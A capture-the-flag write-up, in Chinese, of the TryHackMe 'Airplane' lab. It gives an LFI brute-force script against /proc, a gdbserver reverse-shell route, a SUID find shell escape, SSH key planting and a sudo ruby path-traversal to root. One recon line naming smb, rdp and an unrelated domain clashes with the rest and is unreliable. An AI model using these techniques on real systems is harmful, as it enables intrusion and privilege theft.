Airplane Write Up on TryHackMe

Before all

在Medium Machine吃鱉ㄟ QwQ
但學到好多東西，讚讚owob

Attacker’s IP : 10.9.195.189
Victim’s IP : 10.10.91.11
Victim’s HOST : airplane.thm

Write up

RECON

port scan

Command

rustscan -a 10.10.91.11 --ulimit 5000 -- -sC -sV -Pn

正常的web, ssh和一個不知道幹嘛的 port 6048

在這步驟，發現機器有開啟smb, rdp, http(在port 80 以及 port 7790)，並獲取DNS域名為LAB.ENTERPRISE.THM

Exploit

LFI for port detection

網站有LFI的漏洞，利用針對/proc的爆破抓port 6048的資訊：
(註：利用threading優化)
exp.py

import requests as req
from threading import Thread, Lock
from tqdm import trange

url = 'http://airplane.thm:8000/?page=../../../../../'
found = False
lock = Lock()

def check_process(i):
    global found
    if found:
        return
    web = req.get(url + f'proc/{i}/cmdline')
    if '6048' in web.text:
        with lock:
            if not found:
                found = True
                print(f"proc found : {i}")
                print(web.text)
                web = req.get(url + f'proc/{i}/status')
                print(web.text)

if __name__ == '__main__':
    max_processes = 50000
    threads = []
    for i in trange(1, max_processes + 1):
        if found:
            break
        thread = Thread(target=check_process, args=(i,))
        threads.append(thread)
        thread.start()
        if len(threads) >= 100:
            for t in threads:
                t.join()
            threads = []
    for t in threads:
        t.join()

原來是gdb server!
上Exploit DB上找到這份，照做就彈到reverse shellㄌ
https://www.exploit-db.com/exploits/50539

Privilege Escalation

SUID find to carlos

現在拿到的是husdon的shell，先檢查suid

find / -perm -u=s 2>/dev/null

好ㄟ有find，直接灑GTFOBins上面的payload提權：

find . -exec /bin/sh -p \; -quit  

痾…

只有改到euid
先利用ssh-keygen -o生成ssh憑證，把.pub甩到把/home/carlos/authorized_keys
接著再ssh回去就可以拿到完整carlos權限啦~

ruby shell to root

檢查一下，生個exp.rb：

system("/bin/bash")

因為是用*正則匹配，可以打path traversal trick：

sudo /usr/bin/ruby /root/../home/carlos/shell.rb

After all

我還好弱🤧